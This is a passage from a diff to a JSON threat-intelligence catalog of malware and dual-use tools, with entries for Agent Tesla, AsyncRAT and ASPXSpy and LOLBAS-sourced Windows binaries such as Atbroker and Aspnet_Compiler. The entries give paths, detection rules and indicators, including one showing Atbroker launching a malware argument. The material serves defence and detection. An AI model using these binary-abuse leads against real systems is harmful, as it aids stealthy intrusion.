"dest-uuid": "fb575479-14ef-41e9-bfab-0b7cf10bec73", + "type": "similar" + }, + { + "dest-uuid": "60d36859-4803-4a84-8ce6-b7aead8b0dd8", + "type": "similar" + }, + { + "dest-uuid": "87b3c2d9-49fa-4f4d-bcc0-91c610aafd3e", + "type": "similar" + }, + { + "dest-uuid": "aee4bdbe-dcdb-456e-b198-a9ec4dd0dea9", + "type": "similar" + }, + { + "dest-uuid": "66cd7902-e578-4054-8dc4-a5e027e914b4", + "type": "similar" + } + ], + "uuid": "ef7f4f5f-6f30-4059-87d1-cd8375bf1bee", + "value": "ADVSTORESHELL" + }, + { + "description": "[Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. [[Securelist Agent.btz](https://app.tidalcyber.com/references/3b876c56-1d18-49e3-9a96-5cee4af7ab72)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0092", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "40d3e230-ed32-469f-ba89-be70cc08ab39", + "type": "similar" + } + ], + "uuid": "f27c9a91-c618-40c6-837d-089ba4d80f45", + "value": "Agent.btz" + }, + { + "description": "[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]", + "meta": { + "id": "c58bc73c-1b0a-4a56-9ba4-e79db95da968", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "27fa7573-c1d3-4857-8a45-ef501c8ea32c", + "type": "similar" + } + ], + "uuid": "15123fcb-0ba8-492a-bada-552d828af096", + "value": "AgentExecutor.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Intune Management Extension included on Intune Managed Devices\n\n**Author:** Eleftherios Panos\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Intune Management Extension\n\n**Resources:**\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_agentexecutor.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml)\n* Sigma: [proc_creation_win_lolbin_agentexecutor_susp_usage.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml)[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5205", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "15123fcb-0ba8-492a-bada-552d828af096", + "type": "similar" + } + ], + "uuid": "27fa7573-c1d3-4857-8a45-ef501c8ea32c", + "value": "AgentExecutor" + }, + { + "description": "[Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)][[Bitdefender Agent Tesla April 2020](https://app.tidalcyber.com/references/e3d932fc-0148-43b9-bcc7-971dd7ba3bf8)][[Malwarebytes Agent Tesla April 2020](https://app.tidalcyber.com/references/87f4fe4c-54cd-40a7-938b-6e6f6d2efbea)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0331", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "e7a5229f-05eb-440e-b982-9a6d2b2b87c8", + "type": "similar" + } + ], + "uuid": "304650b1-a0b5-460c-9210-23a5b53815a4", + "value": "Agent Tesla" + }, + { + "description": "[Amadey](https://app.tidalcyber.com/software/f173ec20-ef40-436b-a859-fef017e1e767) is a Trojan bot that has been used since at least October 2018.[[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)][[BlackBerry Amadey 2020](https://app.tidalcyber.com/references/21b7a7c7-55a2-4235-ba11-d34ba68d1bf5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1025", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "05318127-5962-444b-b900-a9dcfe0ff6e9", + "type": "similar" + } + ], + "uuid": "f173ec20-ef40-436b-a859-fef017e1e767", + "value": "Amadey" + }, + { + "description": "[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)][[Medium Anchor DNS July 2020](https://app.tidalcyber.com/references/de246d53-385f-44be-bf0f-25a76442b835)]", + "meta": { + "id": "11d8729e-7635-465f-8629-e4a15e317e02" + }, + "related": [ + { + "dest-uuid": "9521c535-1043-4b82-ba5d-e5eaeca500ee", + "type": "similar" + } + ], + "uuid": "4c66b92a-bfac-4f12-a319-3a16b59f9408", + "value": "Anchor_DNS" + }, + { + "description": "[Anchor](https://app.tidalcyber.com/software/9521c535-1043-4b82-ba5d-e5eaeca500ee) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) on selected high profile targets since at least 2018.[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)][[Medium Anchor DNS July 2020](https://app.tidalcyber.com/references/de246d53-385f-44be-bf0f-25a76442b835)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0504", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5f1d4579-4e8f-48e7-860e-2da773ae432e", + "type": "similar" + }, + { + "dest-uuid": "4c66b92a-bfac-4f12-a319-3a16b59f9408", + "type": "similar" + } + ], + "uuid": "9521c535-1043-4b82-ba5d-e5eaeca500ee", + "value": "Anchor" + }, + { + "description": "[ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) is commodity malware that was widespread in the early 2010's and continues to be observed in infections across a wide variety of industries. During the 2022 [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) campaign, threat actors re-registered expired [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains to spread malware to select targets in Ukraine.[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1074", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcd9548e-df9e-47c2-81f3-bc084289959d", + "type": "similar" + } + ], + "uuid": "69aac793-9e6a-5167-bc62-823189ee2f7b", + "value": "ANDROMEDA" + }, + { + "description": "AnyDesk is a tool used to enable remote connections to network devices.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5007", + "source": "Tidal Cyber", + "tags": [ + "fb06d216-f535-45c1-993a-8c1b7aa2111c", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + } + ], + "uuid": "922447fd-f41e-4bcf-b479-88137c81099c", + "value": "AnyDesk" + }, + { + "description": "[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]", + "meta": { + "id": "a0005bf8-6217-4556-9f3e-a4578669d4b8", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9fa7c759-172f-4ae3-ac3d-0070c3c4c439", + "type": "similar" + } + ], + "uuid": "705af422-c1e8-48e4-97e1-8693ac97e3da", + "value": "AppInstaller.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool used for installation of AppX/MSIX applications on Windows 10\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1333900137232523264](https://twitter.com/notwhickey/status/1333900137232523264)\n\n**Detection:**\n* Sigma: [dns_query_win_lolbin_appinstaller.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml)[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5083", + "source": "Tidal Cyber", + "tags": [ + "837cf289-ad09-48ca-adf9-b46b07015666", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "705af422-c1e8-48e4-97e1-8693ac97e3da", + "type": "similar" + } + ], + "uuid": "9fa7c759-172f-4ae3-ac3d-0070c3c4c439", + "value": "AppInstaller" + }, + { + "description": "[AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used to distribute the [FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) RAT.[[CISA AppleJeus Feb 2021](https://app.tidalcyber.com/references/6873e14d-eba4-4e3c-9ccf-cec1d760f0be)]", + "meta": { + "platforms": [ + "macOS", + "Windows" + ], + "software_attack_id": "S0584", + "source": "MITRE", + "tags": [ + "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "e2d34c63-6f5a-41f5-86a2-e2380f27f858", + "type": "similar" + } + ], + "uuid": "cdeb3110-07e5-4c3d-9eef-e6f2b760ef33", + "value": "AppleJeus" + }, + { + "description": "[AppleSeed](https://app.tidalcyber.com/software/9df2e42e-b454-46ea-b50d-2f7d999f3d42) is a backdoor that has been used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) to target South Korean government, academic, and commercial targets since at least 2021.[[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", + "meta": { + "platforms": [ + "Android", + "Windows" + ], + "software_attack_id": "S0622", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "295721d2-ee20-4fa3-ade3-37f4146b4570", + "type": "similar" + } + ], + "uuid": "9df2e42e-b454-46ea-b50d-2f7d999f3d42", + "value": "AppleSeed" + }, + { + "description": "[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]", + "meta": { + "id": "82eb4e28-3b8c-4f30-8524-c57d6bbf3500", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1328ae5d-7220-46bb-a7ee-0c5a31eeda7f", + "type": "similar" + } + ], + "uuid": "b2e6135b-4a85-48a4-b654-8348a9e6a9b7", + "value": "Appvlp.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Application Virtualization Utility Included with Microsoft Office 2016\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe\n* C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe\n\n**Resources:**\n* [https://github.com/MoooKitty/Code-Execution](https://github.com/MoooKitty/Code-Execution)\n* [https://twitter.com/moo_hax/status/892388990686347264](https://twitter.com/moo_hax/status/892388990686347264)\n* [https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/](https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/)\n* [https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/](https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_appvlp.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml)[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5206", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b2e6135b-4a85-48a4-b654-8348a9e6a9b7", + "type": "similar" + } + ], + "uuid": "1328ae5d-7220-46bb-a7ee-0c5a31eeda7f", + "value": "Appvlp" + }, + { + "description": "[Aria-body](https://app.tidalcyber.com/software/7ba79887-d496-47aa-8b71-df7f46329322) is a custom backdoor that has been used by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) since approximately 2017.[[CheckPoint Naikon May 2020](https://app.tidalcyber.com/references/f080acab-a6a0-42e1-98ff-45e415393648)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0456", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "3161d76a-e2b2-4b97-9906-24909b735386", + "type": "similar" + } + ], + "uuid": "7ba79887-d496-47aa-8b71-df7f46329322", + "value": "Aria-body" + }, + { + "description": "", + "meta": { + "id": "1a897efb-d18b-4e39-a7e0-73d995ee0e5a" + }, + "related": [ + { + "dest-uuid": "45b51950-6190-4572-b1a2-7c69d865251e", + "type": "similar" + } + ], + "uuid": "993a4563-9d3f-41b3-b677-430dbaf9bf30", + "value": "arp.exe" + }, + { + "description": "[Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [[TechNet Arp](https://app.tidalcyber.com/references/7714222e-8046-4884-b460-493d9ef46305)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0099", + "source": "MITRE", + "tags": [ + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", + "type": "similar" + }, + { + "dest-uuid": "993a4563-9d3f-41b3-b677-430dbaf9bf30", + "type": "similar" + } + ], + "uuid": "45b51950-6190-4572-b1a2-7c69d865251e", + "value": "Arp" + }, + { + "description": "[[Aspnet_Compiler.exe - LOLBAS Project](/references/15864c56-115e-4163-b816-03bdb9bfd5c5)]", + "meta": { + "id": "6274b140-4eaf-42ed-9b08-ed971779ac2e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "42763dde-8226-4f31-a3ba-face2da84dd2", + "type": "similar" + } + ], + "uuid": "dd35fa20-68de-455d-8994-914b23cf51a6", + "value": "Aspnet_Compiler.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ASP.NET Compilation Tool\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\n* c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe\n\n**Resources:**\n* [https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/](https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/)\n* [https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_aspnet_compiler.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml)[[Aspnet_Compiler.exe - LOLBAS Project](/references/15864c56-115e-4163-b816-03bdb9bfd5c5)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5084", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dd35fa20-68de-455d-8994-914b23cf51a6", + "type": "similar" + } + ], + "uuid": "42763dde-8226-4f31-a3ba-face2da84dd2", + "value": "Aspnet_Compiler" + }, + { + "description": "", + "meta": { + "id": "22f3ef46-ae31-45c9-8c4a-7be682c2a7ea" + }, + "related": [ + { + "dest-uuid": "a0cce010-9158-45e5-978a-f002e5c31a03", + "type": "similar" + } + ], + "uuid": "70694414-648a-487b-8eaf-beb2cc5ea348", + "value": "ASPXTool" + }, + { + "description": "[ASPXSpy](https://app.tidalcyber.com/software/a0cce010-9158-45e5-978a-f002e5c31a03) is a Web shell. It has been modified by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) actors to create the ASPXTool version. [[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0073", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "type": "similar" + }, + { + "dest-uuid": "70694414-648a-487b-8eaf-beb2cc5ea348", + "type": "similar" + } + ], + "uuid": "a0cce010-9158-45e5-978a-f002e5c31a03", + "value": "ASPXSpy" + }, + { + "description": "[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]", + "meta": { + "id": "f49f4dfa-0011-4a27-9f13-ebd4b7b6eb0a" + }, + "related": [ + { + "dest-uuid": "ea719a35-cbe9-4503-873d-164f68ab4544", + "type": "similar" + } + ], + "uuid": "02f01a87-3a6f-4344-9241-653118990361", + "value": "Guildma" + }, + { + "description": "[Astaroth](https://app.tidalcyber.com/software/ea719a35-cbe9-4503-873d-164f68ab4544) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [[Cybereason Astaroth Feb 2019](https://app.tidalcyber.com/references/eb4dc1f8-c6e7-4d6c-9258-b03a0ae64d2e)][[Cofense Astaroth Sept 2018](https://app.tidalcyber.com/references/d316c581-646d-48e7-956e-34e2f957c67d)][[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0373", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "edb24a93-1f7a-4bbf-a738-1397a14662c6", + "type": "similar" + }, + { + "dest-uuid": "02f01a87-3a6f-4344-9241-653118990361", + "type": "similar" + } + ], + "uuid": "ea719a35-cbe9-4503-873d-164f68ab4544", + "value": "Astaroth" + }, + { + "description": "[AsyncRAT](https://app.tidalcyber.com/software/d587efff-4699-51c7-a4cc-bdbd1b302ed4) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.[[Morphisec Snip3 May 2021](https://app.tidalcyber.com/references/abe44c50-8347-5c98-8b04-d41afbe59d4c)][[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)][[Telefonica Snip3 December 2021](https://app.tidalcyber.com/references/f026dd44-1491-505b-8a8a-e4f28c6cd6a7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1087", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "153c14a6-31b7-44f2-892e-6d9fdc152267", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "6a5947f3-1a36-4653-8734-526df3e1d28d", + "type": "similar" + } + ], + "uuid": "d587efff-4699-51c7-a4cc-bdbd1b302ed4", + "value": "AsyncRAT" + }, + { + "description": "", + "meta": { + "id": "d731100e-185c-488b-8861-cd5a71f11475" + }, + "related": [ + { + "dest-uuid": "af01dc7b-a2bc-4fda-bbfe-d2be889c2860", + "type": "similar" + } + ], + "uuid": "96ce505e-9144-473a-b197-0846ae712de8", + "value": "at.exe" + }, + { + "description": "[at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is used to schedule tasks on a system to run at a specified date or time.[[TechNet At](https://app.tidalcyber.com/references/31b40c09-d68f-4889-b585-c077bd9cef28)][[Linux at](https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0110", + "source": "MITRE", + "tags": [ + "5bc4c6c6-36df-4a53-920c-53e17d7027db", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "type": "similar" + }, + { + "dest-uuid": "96ce505e-9144-473a-b197-0846ae712de8", + "type": "similar" + } + ], + "uuid": "af01dc7b-a2bc-4fda-bbfe-d2be889c2860", + "value": "at" + }, + { + "description": "[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]", + "meta": { + "id": "501b5a8f-93c2-4627-8944-52d0b80d91ad", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2efae55c-86f3-4234-af26-1c75e922d81a", + "type": "similar" + } + ], + "uuid": "15e08d84-1977-4cc5-a73a-bd1cadff4bf0", + "value": "Atbroker.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Helper binary for Assistive Technology (AT)\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Atbroker.exe\n* C:\\Windows\\SysWOW64\\Atbroker.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/](http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_atbroker.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml)\n* Sigma: [registry_event_susp_atbroker_change.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml)\n* IOC: Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration\n* IOC: Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\n* IOC: Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]", + "meta": { + "owner": 